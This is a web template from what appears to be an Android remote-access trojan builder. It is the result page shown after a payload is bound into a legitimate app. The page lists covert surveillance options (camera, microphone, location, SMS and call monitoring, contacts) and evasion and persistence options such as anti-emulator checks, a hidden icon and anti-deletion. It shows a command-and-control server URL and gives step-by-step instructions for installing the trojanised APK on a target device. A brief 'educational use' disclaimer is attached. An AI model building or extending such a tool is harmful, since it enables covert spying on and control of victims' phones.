{% extends "layout.html" %}

{% block title %}APK Binding Result{% endblock %}

{% block content %}
<div class="container mt-4">
    <div class="row">
        <div class="col-lg-8 mx-auto">
            <div class="card">
                <div class="card-header bg-success text-white">
                    <h2 class="mb-0"><i class="fas fa-check-circle"></i> APK Binding Successful</h2>
                </div>
                <div class="card-body">
                    <div class="alert alert-success">
                        <p><i class="fas fa-info-circle"></i> The APK has been successfully bound with the remote access payload.</p>
                    </div>
                    
                    <div class="row mb-4">
                        <div class="col-md-6">
                            <h4>Original APK Information</h4>
                            <ul class="list-group">
                                <li class="list-group-item d-flex justify-content-between">
                                    <span>Package Name:</span>
                                    <strong>{{ package_name }}</strong>
                                </li>
                                <li class="list-group-item d-flex justify-content-between">
                                    <span>Application Name:</span>
                                    <strong>{{ app_name }}</strong>
                                </li>
                            </ul>
                        </div>
                        <div class="col-md-6">
                            <h4>Generated APK</h4>
                            <ul class="list-group">
                                <li class="list-group-item d-flex justify-content-between">
                                    <span>Bound APK:</span>
                                    <strong>{{ bound_filename }}</strong>
                                </li>
                                <li class="list-group-item">
                                    <a href="{{ url_for('download_bound_apk', filename=bound_filename) }}" class="btn btn-primary btn-sm w-100">
                                        <i class="fas fa-download"></i> Download Bound APK
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    
                    <h4>Payload Configuration</h4>
                    <div class="row">
                        <div class="col-md-6">
                            <div class="card mb-3">
                                <div class="card-header">
                                    <h5 class="mb-0">Security Features</h5>
                                </div>
                                <div class="card-body">
                                    <ul class="list-group">
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Anti-Emulator Detection:</span>
                                            <span class="badge {{ 'bg-success' if configs.anti_emulator else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.anti_emulator else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Hide App Icon:</span>
                                            <span class="badge {{ 'bg-success' if configs.hide_app_icon else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.hide_app_icon else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Persist Across Reboots:</span>
                                            <span class="badge {{ 'bg-success' if configs.persistent_across_reboots else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.persistent_across_reboots else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Anti-Deletion Protection:</span>
                                            <span class="badge {{ 'bg-success' if configs.anti_deletion else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.anti_deletion else 'Disabled' }}
                                            </span>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                        
                        <div class="col-md-6">
                            <div class="card mb-3">
                                <div class="card-header">
                                    <h5 class="mb-0">Surveillance Features</h5>
                                </div>
                                <div class="card-body">
                                    <ul class="list-group">
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Camera Access:</span>
                                            <span class="badge {{ 'bg-success' if configs.camera_access else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.camera_access else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Microphone Access:</span>
                                            <span class="badge {{ 'bg-success' if configs.mic_access else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.mic_access else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Location Tracking:</span>
                                            <span class="badge {{ 'bg-success' if configs.location_access else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.location_access else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>SMS/Calls Monitoring:</span>
                                            <span class="badge {{ 'bg-success' if configs.sms_access else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.sms_access else 'Disabled' }}
                                            </span>
                                        </li>
                                        <li class="list-group-item d-flex justify-content-between">
                                            <span>Contacts Access:</span>
                                            <span class="badge {{ 'bg-success' if configs.contacts_access else 'bg-secondary' }}">
                                                {{ 'Enabled' if configs.contacts_access else 'Disabled' }}
                                            </span>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                    
                    <div class="mb-3">
                        <div class="alert alert-info">
                            <strong>C&C Server URL:</strong> {{ configs.server_url }}
                        </div>
                    </div>
                    
                    <div class="d-grid gap-2 d-md-flex justify-content-md-end">
                        <a href="{{ url_for('apk_binding') }}" class="btn btn-secondary">
                            <i class="fas fa-arrow-left"></i> Back to APK Binding
                        </a>
                        <a href="{{ url_for('dashboard') }}" class="btn btn-primary">
                            <i class="fas fa-tachometer-alt"></i> Go to Dashboard
                        </a>
                    </div>
                </div>
            </div>
            
            <div class="card mt-4">
                <div class="card-header">
                    <h4 class="mb-0"><i class="fas fa-exclamation-triangle"></i> Important Notes</h4>
                </div>
                <div class="card-body">
                    <div class="alert alert-warning">
                        <h5><i class="fas fa-shield-alt"></i> Disclaimer</h5>
                        <p>This tool is for educational and authorized security testing purposes only. Unauthorized use against third parties is illegal and unethical.</p>
                    </div>
                    
                    <h5>Deployment Instructions:</h5>
                    <ol>
                        <li>Transfer the bound APK to the target device</li>
                        <li>Install the APK (may need to enable "Unknown Sources" in Android settings)</li>
                        <li>Launch the application once to start the payload</li>
                        <li>The device will connect back to the C&C server automatically</li>
                        <li>Monitor and control the device from the dashboard</li>
                    </ol>
                </div>
            </div>
        </div>
    </div>
</div>
{% endblock %}